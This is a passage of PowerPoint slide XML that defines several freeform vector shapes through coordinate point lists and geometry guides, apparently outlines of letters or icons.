                    <a:lnTo>
                      <a:pt x="362" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="315"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="315" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="315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2" name="Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3165475" y="5565775"/>
                <a:ext cx="228600" cy="279400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 447 w 636"/>
                  <a:gd name="T1" fmla="*/ 268 h 778"/>
                  <a:gd name="T2" fmla="*/ 452 w 636"/>
                  <a:gd name="T3" fmla="*/ 273 h 778"/>
                  <a:gd name="T4" fmla="*/ 520 w 636"/>
                  <a:gd name="T5" fmla="*/ 268 h 778"/>
                  <a:gd name="T6" fmla="*/ 551 w 636"/>
                  <a:gd name="T7" fmla="*/ 284 h 778"/>
                  <a:gd name="T8" fmla="*/ 583 w 636"/>
                  <a:gd name="T9" fmla="*/ 305 h 778"/>
                  <a:gd name="T10" fmla="*/ 630 w 636"/>
                  <a:gd name="T11" fmla="*/ 368 h 778"/>
                  <a:gd name="T12" fmla="*/ 635 w 636"/>
                  <a:gd name="T13" fmla="*/ 442 h 778"/>
                  <a:gd name="T14" fmla="*/ 620 w 636"/>
                  <a:gd name="T15" fmla="*/ 483 h 778"/>
                  <a:gd name="T16" fmla="*/ 557 w 636"/>
                  <a:gd name="T17" fmla="*/ 583 h 778"/>
                  <a:gd name="T18" fmla="*/ 510 w 636"/>
                  <a:gd name="T19" fmla="*/ 636 h 778"/>
                  <a:gd name="T20" fmla="*/ 415 w 636"/>
                  <a:gd name="T21" fmla="*/ 730 h 778"/>
                  <a:gd name="T22" fmla="*/ 331 w 636"/>
                  <a:gd name="T23" fmla="*/ 772 h 778"/>
                  <a:gd name="T24" fmla="*/ 294 w 636"/>
                  <a:gd name="T25" fmla="*/ 777 h 778"/>
                  <a:gd name="T26" fmla="*/ 221 w 636"/>
                  <a:gd name="T27" fmla="*/ 762 h 778"/>
                  <a:gd name="T28" fmla="*/ 189 w 636"/>
                  <a:gd name="T29" fmla="*/ 736 h 778"/>
                  <a:gd name="T30" fmla="*/ 147 w 636"/>
                  <a:gd name="T31" fmla="*/ 672 h 778"/>
                  <a:gd name="T32" fmla="*/ 137 w 636"/>
                  <a:gd name="T33" fmla="*/ 641 h 778"/>
                  <a:gd name="T34" fmla="*/ 142 w 636"/>
                  <a:gd name="T35" fmla="*/ 599 h 778"/>
                  <a:gd name="T36" fmla="*/ 0 w 636"/>
                  <a:gd name="T37" fmla="*/ 546 h 778"/>
                  <a:gd name="T38" fmla="*/ 609 w 636"/>
                  <a:gd name="T39" fmla="*/ 95 h 778"/>
                  <a:gd name="T40" fmla="*/ 210 w 636"/>
                  <a:gd name="T41" fmla="*/ 552 h 778"/>
                  <a:gd name="T42" fmla="*/ 205 w 636"/>
                  <a:gd name="T43" fmla="*/ 589 h 778"/>
                  <a:gd name="T44" fmla="*/ 226 w 636"/>
                  <a:gd name="T45" fmla="*/ 625 h 778"/>
                  <a:gd name="T46" fmla="*/ 242 w 636"/>
                  <a:gd name="T47" fmla="*/ 636 h 778"/>
                  <a:gd name="T48" fmla="*/ 284 w 636"/>
                  <a:gd name="T49" fmla="*/ 641 h 778"/>
                  <a:gd name="T50" fmla="*/ 305 w 636"/>
                  <a:gd name="T51" fmla="*/ 630 h 778"/>
                  <a:gd name="T52" fmla="*/ 404 w 636"/>
                  <a:gd name="T53" fmla="*/ 541 h 778"/>
                  <a:gd name="T54" fmla="*/ 457 w 636"/>
                  <a:gd name="T55" fmla="*/ 478 h 778"/>
                  <a:gd name="T56" fmla="*/ 488 w 636"/>
                  <a:gd name="T57" fmla="*/ 431 h 778"/>
                  <a:gd name="T58" fmla="*/ 494 w 636"/>
                  <a:gd name="T59" fmla="*/ 389 h 778"/>
                  <a:gd name="T60" fmla="*/ 473 w 636"/>
                  <a:gd name="T61" fmla="*/ 352 h 778"/>
                  <a:gd name="T62" fmla="*/ 457 w 636"/>
                  <a:gd name="T63" fmla="*/ 342 h 778"/>
                  <a:gd name="T64" fmla="*/ 420 w 636"/>
                  <a:gd name="T65" fmla="*/ 336 h 778"/>
                  <a:gd name="T66" fmla="*/ 399 w 636"/>
                  <a:gd name="T67" fmla="*/ 347 h 778"/>
                  <a:gd name="T68" fmla="*/ 294 w 636"/>
                  <a:gd name="T69" fmla="*/ 436 h 778"/>
                  <a:gd name="T70" fmla="*/ 242 w 636"/>
                  <a:gd name="T71" fmla="*/ 499 h 7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36" h="778">
                    <a:moveTo>
                      <a:pt x="609" y="95"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="95"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="210" y="552"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="552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" name="Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3314700" y="5688013"/>
                <a:ext cx="212725" cy="242887"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 462 w 589"/>
                  <a:gd name="T1" fmla="*/ 236 h 673"/>
                  <a:gd name="T2" fmla="*/ 110 w 589"/>
                  <a:gd name="T3" fmla="*/ 672 h 673"/>
                  <a:gd name="T4" fmla="*/ 0 w 589"/>
                  <a:gd name="T5" fmla="*/ 577 h 673"/>
                  <a:gd name="T6" fmla="*/ 352 w 589"/>
                  <a:gd name="T7" fmla="*/ 147 h 673"/>
                  <a:gd name="T8" fmla="*/ 462 w 589"/>
                  <a:gd name="T9" fmla="*/ 236 h 673"/>
                  <a:gd name="T10" fmla="*/ 588 w 589"/>
                  <a:gd name="T11" fmla="*/ 89 h 673"/>
                  <a:gd name="T12" fmla="*/ 509 w 589"/>
                  <a:gd name="T13" fmla="*/ 184 h 673"/>
                  <a:gd name="T14" fmla="*/ 399 w 589"/>
                  <a:gd name="T15" fmla="*/ 95 h 673"/>
                  <a:gd name="T16" fmla="*/ 473 w 589"/>
                  <a:gd name="T17" fmla="*/ 0 h 673"/>
                  <a:gd name="T18" fmla="*/ 588 w 589"/>
                  <a:gd name="T19" fmla="*/ 89 h 6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89" h="673">
                    <a:moveTo>
                      <a:pt x="462" y="236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="236"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="588" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="509" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="89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4" name="Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3387725" y="5743575"/>
                <a:ext cx="204788" cy="244475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 567 w 568"/>
                  <a:gd name="T1" fmla="*/ 89 h 678"/>
                  <a:gd name="T2" fmla="*/ 115 w 568"/>
                  <a:gd name="T3" fmla="*/ 677 h 678"/>
                  <a:gd name="T4" fmla="*/ 0 w 568"/>
                  <a:gd name="T5" fmla="*/ 593 h 678"/>
                  <a:gd name="T6" fmla="*/ 451 w 568"/>
                  <a:gd name="T7" fmla="*/ 0 h 678"/>
                  <a:gd name="T8" fmla="*/ 567 w 568"/>
                  <a:gd name="T9" fmla="*/ 89 h 6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8" h="678">
                    <a:moveTo>
                      <a:pt x="567" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="115" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="89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" name="Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3465513" y="5792788"/>
                <a:ext cx="198437" cy="252412"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 441 w 552"/>
                  <a:gd name="T1" fmla="*/ 242 h 699"/>
                  <a:gd name="T2" fmla="*/ 116 w 552"/>
                  <a:gd name="T3" fmla="*/ 698 h 699"/>
                  <a:gd name="T4" fmla="*/ 0 w 552"/>
                  <a:gd name="T5" fmla="*/ 614 h 699"/>
                  <a:gd name="T6" fmla="*/ 325 w 552"/>
                  <a:gd name="T7" fmla="*/ 158 h 699"/>
                  <a:gd name="T8" fmla="*/ 441 w 552"/>
                  <a:gd name="T9" fmla="*/ 242 h 699"/>
                  <a:gd name="T10" fmla="*/ 551 w 552"/>
                  <a:gd name="T11" fmla="*/ 84 h 699"/>
                  <a:gd name="T12" fmla="*/ 483 w 552"/>
                  <a:gd name="T13" fmla="*/ 184 h 699"/>
                  <a:gd name="T14" fmla="*/ 362 w 552"/>
                  <a:gd name="T15" fmla="*/ 100 h 699"/>
                  <a:gd name="T16" fmla="*/ 436 w 552"/>
                  <a:gd name="T17" fmla="*/ 0 h 699"/>
                  <a:gd name="T18" fmla="*/ 551 w 552"/>
                  <a:gd name="T19" fmla="*/ 84 h 6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52" h="699">
                    <a:moveTo>
                      <a:pt x="441" y="242"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="242"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="551" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="483" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="84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6" name="Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3565525" y="5857875"/>
                <a:ext cx="173038" cy="263525"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 478 w 479"/>
                  <a:gd name="T1" fmla="*/ 78 h 730"/>
                  <a:gd name="T2" fmla="*/ 389 w 479"/>
                  <a:gd name="T3" fmla="*/ 215 h 730"/>
                  <a:gd name="T4" fmla="*/ 462 w 479"/>
                  <a:gd name="T5" fmla="*/ 257 h 730"/>
                  <a:gd name="T6" fmla="*/ 410 w 479"/>
                  <a:gd name="T7" fmla="*/ 341 h 730"/>
                  <a:gd name="T8" fmla="*/ 336 w 479"/>
                  <a:gd name="T9" fmla="*/ 294 h 730"/>
                  <a:gd name="T10" fmla="*/ 173 w 479"/>
                  <a:gd name="T11" fmla="*/ 551 h 730"/>
                  <a:gd name="T12" fmla="*/ 173 w 479"/>
                  <a:gd name="T13" fmla="*/ 551 h 730"/>
                  <a:gd name="T14" fmla="*/ 158 w 479"/>
                  <a:gd name="T15" fmla="*/ 577 h 730"/>
                  <a:gd name="T16" fmla="*/ 158 w 479"/>
                  <a:gd name="T17" fmla="*/ 593 h 730"/>
                  <a:gd name="T18" fmla="*/ 158 w 479"/>
                  <a:gd name="T19" fmla="*/ 593 h 730"/>
                  <a:gd name="T20" fmla="*/ 163 w 479"/>
                  <a:gd name="T21" fmla="*/ 614 h 730"/>
                  <a:gd name="T22" fmla="*/ 184 w 479"/>
                  <a:gd name="T23" fmla="*/ 630 h 730"/>
                  <a:gd name="T24" fmla="*/ 184 w 479"/>
                  <a:gd name="T25" fmla="*/ 630 h 730"/>
                  <a:gd name="T26" fmla="*/ 194 w 479"/>
                  <a:gd name="T27" fmla="*/ 635 h 730"/>
                  <a:gd name="T28" fmla="*/ 194 w 479"/>
                  <a:gd name="T29" fmla="*/ 635 h 730"/>
                  <a:gd name="T30" fmla="*/ 210 w 479"/>
                  <a:gd name="T31" fmla="*/ 645 h 730"/>
                  <a:gd name="T32" fmla="*/ 158 w 479"/>
                  <a:gd name="T33" fmla="*/ 729 h 730"/>
                  <a:gd name="T34" fmla="*/ 158 w 479"/>
                  <a:gd name="T35" fmla="*/ 729 h 730"/>
                  <a:gd name="T36" fmla="*/ 116 w 479"/>
                  <a:gd name="T37" fmla="*/ 703 h 730"/>
                  <a:gd name="T38" fmla="*/ 116 w 479"/>
                  <a:gd name="T39" fmla="*/ 703 h 730"/>
                  <a:gd name="T40" fmla="*/ 74 w 479"/>
                  <a:gd name="T41" fmla="*/ 682 h 730"/>
                  <a:gd name="T42" fmla="*/ 74 w 479"/>
                  <a:gd name="T43" fmla="*/ 682 h 730"/>
                  <a:gd name="T44" fmla="*/ 42 w 479"/>
                  <a:gd name="T45" fmla="*/ 656 h 730"/>
                  <a:gd name="T46" fmla="*/ 21 w 479"/>
                  <a:gd name="T47" fmla="*/ 640 h 730"/>
                  <a:gd name="T48" fmla="*/ 21 w 479"/>
                  <a:gd name="T49" fmla="*/ 640 h 730"/>
                  <a:gd name="T50" fmla="*/ 6 w 479"/>
                  <a:gd name="T51" fmla="*/ 619 h 730"/>
                  <a:gd name="T52" fmla="*/ 0 w 479"/>
                  <a:gd name="T53" fmla="*/ 598 h 730"/>
                  <a:gd name="T54" fmla="*/ 0 w 479"/>
                  <a:gd name="T55" fmla="*/ 598 h 730"/>
                  <a:gd name="T56" fmla="*/ 0 w 479"/>
                  <a:gd name="T57" fmla="*/ 572 h 730"/>
                  <a:gd name="T58" fmla="*/ 11 w 479"/>
                  <a:gd name="T59" fmla="*/ 545 h 730"/>
                  <a:gd name="T60" fmla="*/ 11 w 479"/>
                  <a:gd name="T61" fmla="*/ 545 h 730"/>
                  <a:gd name="T62" fmla="*/ 42 w 479"/>
                  <a:gd name="T63" fmla="*/ 488 h 730"/>
                  <a:gd name="T64" fmla="*/ 216 w 479"/>
                  <a:gd name="T65" fmla="*/ 215 h 730"/>
